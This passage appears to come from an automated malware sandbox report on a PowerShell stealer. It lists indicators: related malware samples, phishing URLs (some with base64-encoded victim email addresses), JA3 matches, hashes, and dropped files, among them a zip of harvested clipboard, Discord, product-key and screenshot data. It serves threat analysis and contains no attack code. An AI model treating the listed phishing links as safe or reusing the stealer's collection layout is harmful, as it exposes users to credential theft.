                                        A1YOFV1abV.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 208.95.112.1
                                        Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        20240704-455.exeGet hashmaliciousGuLoaderBrowse
                                        • 208.95.112.1
                                        GITHUBUSSecuriteInfo.com.FileRepMalware.1111.23697.exeGet hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.4
                                        https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.3
                                        http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.4
                                        SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exeGet hashmaliciousRUSTDESKBrowse
                                        • 140.82.121.3
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.114.4
                                        SecuriteInfo.com.not-a-virus.RemoteAdmin.Win64.RustDesk.gen.28668.9992.exeGet hashmaliciousRUSTDESKBrowse
                                        • 140.82.121.4
                                        kematian_shellcode.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        main.ps1Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        update23.batGet hashmaliciousBraodoBrowse
                                        • 140.82.121.4
                                        CLOUDFLARENETUSc2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205
                                        6xmBUtHylU.exeGet hashmaliciousLummaCBrowse
                                        • 188.114.96.3
                                        XX(1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        OVER DUE INVOICE PAYMENT.docxGet hashmaliciousSnake KeyloggerBrowse
                                        • 188.114.96.3
                                        https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.2.184
                                        Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        https://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.2.184
                                        https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                                        • 188.114.97.3
                                        http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 172.67.138.117

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0ec2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        XX(1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        Ship Docs_CI PL HBL COO_.exeGet hashmaliciousAgentTeslaBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        https://sula.starladeroff.com/Get hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        https://pradeeprunner.com/auth.htmlGet hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133
                                        https://iwahadxi.hosted.phplist.com/lists/lt.php/?tid=eU1SAFEEUlZTABhUAVAGGAZWVFsfXVQLWkkDBQIAUAwCAgcAAldPWwdaBlNRVAgYVwEEXh9QClxcSQcAUlcbWgQGAAJVVwRXBAoBSQcBAVALVA8LHwIEXVtJUg8GVxsAVVMHGA5SB1EBC1YDAQQBDAGet hashmaliciousUnknownBrowse
                                        • 140.82.121.3
                                        • 185.199.110.133
                                        • 104.16.123.96
                                        • 185.199.111.133

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32790
                                        Entropy (8bit):5.057207221931379
                                        Encrypted:false
                                        SSDEEP:768:nLbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhxCardFvJQOdB8tAHkLNZzNKe1MlYo7h:nLbV3CNBQkj2Uh4iUx1flJnPvlOgqdJF
                                        MD5:D53B416BCC88BD45D60DE9EB0537E679
                                        SHA1:95A90746CE8894F995A49774DC40817DA70B9CBB
                                        SHA-256:07E86C4B9B4FFD0AD5381DDFA6D95CAD3C29C9F3B6790354058E46EC445B0BBF
                                        SHA-512:BB3407649106150625694C64BC5341BC93C8D3313A555CC495793CAAA294939944E28882D9C70EAE432462E66B85D47D4032CD49898B3CD363011C8AA55B5FA9
                                        Malicious:false
                                        Preview:PSMODULECACHE.1...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Temp\NzE0MzRENTYtMTU0OC1FRDNELUFFRTYtQzc1QUVDRDkzQkYw_VVM=_Sk9ORVMtUEM=_MjAyNC0wNy0wNQ==_VVRDLTU=.zip

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:modified
                                        Size (bytes):453661
                                        Entropy (8bit):7.998105367806698
                                        Encrypted:true
                                        SSDEEP:6144:y9Lqp2snxMCF1lvpXPbno1uzMWm9DxaCoLkEFj+XBXdFO2HM6Tr59SVGo09G6Tnm:ytyDTbno8okCoJNWUn6DrGvI0
                                        MD5:AA9B76622BCF24547D7D29761417EB51
                                        SHA1:92ED488C3921F562E43B77CEA69AD73D40717C79
                                        SHA-256:2AAD168EF2D425CDB71DD45549523C6D0F16BCC3C79CA4ADEE5D6D8E763A2F92
                                        SHA-512:F08D82769654B383A75569D89271F087C0120D71BDE38422789288BA67872484F516799B5F4D53066157BC16AE9F79CD0876D41C2A5356601AD6950FCA47A9F9
                                        Malicious:false
                                        Preview:PK........Q..X............8...US-(user-PC)-(2024-07-05)-(UTC-5)\clipboard_history.txtPK........`..XO..%......../...US-(user-PC)-(2024-07-05)-(UTC-5)\discord.json.+....PK........Q..Xb.7.9...@...1...US-(user-PC)-(2024-07-05)-(UTC-5)\productkey.txt.....!.!...A.HG.y..&@.;..C..1PF.......!.(..`.....M.x....PK........y..X]...I.......1...US-(user-PC)-(2024-07-05)-(UTC-5)\screenshot.pngl.{<S...~6s..V...Ln!J"ln.(.K$...J..6...k.....r.Q..~.r.s..m.....~...=.....9;....|........<....a.Z...X.O!...s .....g.........yM...".vo...}.....#?.....;......4}j3..*~h.......p.f.=n.z...3..D......~7.d..v.r'..k..H...q.1.T.=.).........@..2..n=..<.....Qr..r.....R~.b.{X.J&nV>.i..<eF;.x..V.o.j...l.\U"......j.....[...?qV..4...\=...Y....O..a..v..m......~.....8l..po....-...)....%.S.{.!1!...1...B.;B..$k.O.dk..n.E._m.Z..L>jB.~.W.....=sP0.`...>.5..:...<{t.=uge.Mq]!./.....~......[)+..CE.w.+.F....n._..P..e5..OK..X....,]....K..l.....2w......W..7{....{...|..n....K...LC.......+....K...nY..Z.;.U.

                                        C:\Users\user\AppData\Local\Temp\RES4A61.tmp

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Jul 5 05:50:52 2024, 1st section name ".debug$S"
                                        Category:dropped
                                        Size (bytes):1332
                                        Entropy (8bit):4.0119324930428455
                                        Encrypted:false
                                        SSDEEP:24:H6zW91+fENaDfHDwKEsmNwI+ycuZhNcQkRakS3QkWPNnqS2d:QENg0Khmm1ulhoa3gnqSG
                                        MD5:47D5B587DC8842FDBE224C1B70EA98ED
                                        SHA1:D29F0056F736240164A1DAACF6ACF8D29693EA50
                                        SHA-256:7866DF3A65C5DDD608D4687756A801D3759E3A9C8782D1060089F62C1C390A6D
                                        SHA-512:3FB0151D042185453CE0F658ACC12512CB90A9C38CF30FC61A08FB0C9938A732E2479D4931D6E2F238479F9595E92D29192CF53461921AEA91B427369253734F
                                        Malicious:false
                                        Preview:L......f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP................#..+'F.@.LC..y..........4.......C:\Users\user\AppData\Local\Temp\RES4A61.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_131zpzyd.ao2.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1a5vmr5y.2sq.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bm1p00h.32h.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1tugq0.vjt.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34u5l0tb.05s.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x05fz0i.xzo.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az14t1sa.5pd.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_be03rlz1.vay.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj1jyvoq.kdm.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbnujjc.fo4.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwh02dx0.bdp.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etnufafd.yrh.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0c21v2z.gen.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k315zlmt.dfr.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syrx214o.4vl.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryhonqj.sfv.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4dkwuke.wz1.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
